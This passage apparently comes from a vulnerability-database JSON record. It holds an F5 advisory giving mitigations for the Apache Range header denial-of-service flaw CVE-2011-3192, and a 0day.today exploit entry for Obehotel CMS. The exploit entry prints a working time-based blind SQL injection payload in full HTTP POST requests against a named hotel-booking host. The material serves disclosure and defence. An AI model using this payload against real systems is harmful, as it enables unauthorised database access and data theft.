\nRequestHeader unset Request-Range\" \n\n 4. Save the new file.\n 5. Merge the **CVE-2011-3192 **file into the BIG-IP system configuration by typing the following command: \n \nbpsh < CVE-2011-3192\n 6. Save the configuration by typing the following command: \n \nbigpipe save all\n 7. Restart the **httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**BIG-IP 9.0.0 through 9.4.1** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset all **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range **and **Request-Range **headers will be removed from all requests. \n\n\n 1. Log in to the BIG-IP system command line.\n 2. Change directories to the **/config/httpd/conf** directory by typing the following command: \n \ncd /config/httpd/conf\n 3. Back up the original **httpd.conf** file by typing the following command: \n \ncp httpd.conf httpd.conf.bak\n 4. Open the **httpd.conf** file in a text editor.\n 5. Add the following lines to the end of the file: \n \n# CVE-2011-3192 \nRequestHeader unset Range \nRequestHeader unset Request-Range \n\n 6. Save the** httpd.conf** file.\n 7. Restart the** httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**Configure BIG-IP virtual servers to protect vulnerable back-end Apache servers**\n\nWhile the BIG-IP virtual servers are not vulnerable, the BIG-IP system will proxy exploits to vulnerable Apache servers behind the BIG-IP system. You can protect these servers by removing the **Range **header from all requests. To do so, apply an iRule containing the following logic to each BIG-IP virtual server:\n\n**Impact of recommended action:** The **Range** header will be removed from all requests.\n\nwhen HTTP_REQUEST { \n # remove Range requests for CVE-2011-3192 \n HTTP::header remove Range \n HTTP::header remove Request-Range \n} \n\n\nIt is possible to use a custom BIG-IP ASM attack signature or more sophisticated iRule logic to protect back-end Apache servers. For more information, refer to the DevCentral article referenced in the [Supplemental Information](<https://support.f5.com/csp/article/K13114#supplemental>) section.\n\n**FirePass**\n\n * None\n\n**Enterprise Manager 2.x** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** header will be removed from a request only when more than five ranges are specified and the **Request-Range **header will be removed from all requests. \n\n 1. Log in to the Enterprise Manager system command line.\n 2. Change directories to the** /var/tmp** directory by typing the following command: \n \ncd /var/tmp\n 3. Using a text editor, create a new file named** CVE-2011-3192** and paste the following lines into it: \n \nhttpd include \" \n# CVE-2011-3192 \n# Drop the Range header when more than 5 ranges \nSetEnvIf Range (,.*?){5,} bad-range=1 \nRequestHeader unset Range env=bad-range \nRequestHeader unset Request-Range\"\n 4. Save the new file.\n 5. Merge the** CVE-2011-3192** file into the BIG-IP system configuration by typing the following command: \n \nbpsh < CVE-2011-3192\n 6. Save the configuration by typing the following command: \n \nbigpipe save all\n 7. Restart the** httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**Enterprise Manager 1.x** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** and **Request-Range **headers will be removed from all requests.\n\n 1. Log in to the Enterprise Manager system command line.\n 2. Change directories to the** /config/httpd/conf** directory by typing the following command: \n \ncd /config/httpd/conf\n 3. Back up the original **httpd.conf** file by typing the following command: \n \ncp httpd.conf httpd.conf.bak\n 4. Open the **httpd.conf** file in a text editor.\n 5. Add the following lines to the end of the file: \n \n# CVE-2011-3192 \nRequestHeader unset Range \nRequestHeader unset Request-Range \n 6. Save the** httpd.conf** file.\n 7. Restart the **httpd **service by typing the following command: \n \nbigstart restart httpd\n\n**ARX**\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, do not enable the API functionality. \n\n\n * [CERT advisory regarding CVE-2011-3192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>)\n * [Apache Security Advisory regarding CVE-2011-3192](<http://people.apache.org/~dirkx/CVE-2011-3192.txt>)\n\n**Note**: This link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n * [DevCentral: F5 Friday: Zero-Day Apache Exploit? Zero-Problem](<https://devcentral.f5.com/s/articles/f5-friday-zero-day-apache-exploit-zero-problem>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10025: Managing F5 product hotfixes for BIG-IP version 10.x systems](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K31123>)\n", "modified": "2019-06-06T18:27:00", "published": "2013-09-12T04:10:00", "id": "F5:K13114", "href": "https://support.f5.com/csp/article/K13114", "title": "Apache Range header vulnerability - CVE-2011-3192", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-02-06T05:14:16", "bulletinFamily": "exploit", "description": "Obehotel CMS suffers from denial of service, insecure transit, directory listing, and remote SQL injection vulnerabilities.", "modified": "2013-08-27T00:00:00", "published": "2013-08-27T00:00:00", "id": "1337DAY-ID-21170", "href": "https://0day.today/exploit/description/21170", "type": "zdt", "title": "Obehotel CMS SQL Injection Vulnerability", "sourceData": "OBEHOTEL (Spanish) CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post\r\n\r\nI-VULNERABILITY\r\n-------------------------\r\n\r\n#Title: OBEHOTEL CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post\r\n\r\n#Vendor:https://secureadv.obehotel.com/mpa/\r\n\r\n#Author:Juan Carlos Garc\u00eda (@secnight)\r\n\r\n#Follow me \r\n\r\n http://www.highsec.es\r\n http://hackingmadrid.blogspot.com\r\nTwitter:@secnight\r\n\r\n\r\n\r\nII-Introduction:\r\n================\r\n\r\nObehotel is the set of different solutions, technological developments and applications directed\r\nto hotels for online marketing and distribution aimed at improving both hoteliers processes such as customer experience.\r\n\r\nObehotel is the result of joint effort conducted by professionals with extensive experience in the ICT-Sector\r\nEfimatica-and marketing professionals-Travel Tourism Sector Holidaysinspain.com-like main online distribution partner.\r\n\r\nThis union puts them as one of the major Spanish companies specializing in online distribution technology applied to the Hospitality Industry.\r\n\r\n-------------------------\r\n\r\nIII-PROOF OF CONCEPT\r\n====================\r\n\r\n\r\nAttack details\r\n--------------\r\n\r\nBlind SqlInjection\r\n******************\r\n\r\nSQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input.\r\n\r\nAn SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't\r\nproperly filter out dangerous characters. \r\n\r\nAn attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. \r\n\r\nDepending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker.\r\n\r\nIt may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases,\r\nit may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.\r\n\r\nCertain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). \r\n\r\nIf an attacker can obtain access to these procedures it may be possible to compromise the entire machine.\r\n\r\n\r\n\r\nAttack details\r\n--------------\r\n\r\nURL encoded POST input username was set to\r\n\r\nxlgskuot' or (sleep(2)+1) limit 1 -- \r\n\r\nPOST /mpa/index.php \r\n\r\n\r\nServer: Apache/2.2.16 (Debian)\r\nX-Powered-By: PHP/5.3.3-7+squeeze14\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nLocation: ./hotel_inicio/index.php\r\nVary: Accept-Encoding\r\nContent-Length: 3402\r\nKeep-Alive: timeout=15, max=92\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=utf-8\r\n\r\n\r\npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20\r\n\r\nvariant (1)\r\n\r\nname\r\n\r\nPOST /mpa/index.php HTTP/1.1\r\nContent-Length: 92\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3\r\nHost: secureadv.obehotel.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\nAccept: */*\r\n\r\npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21170"}]}
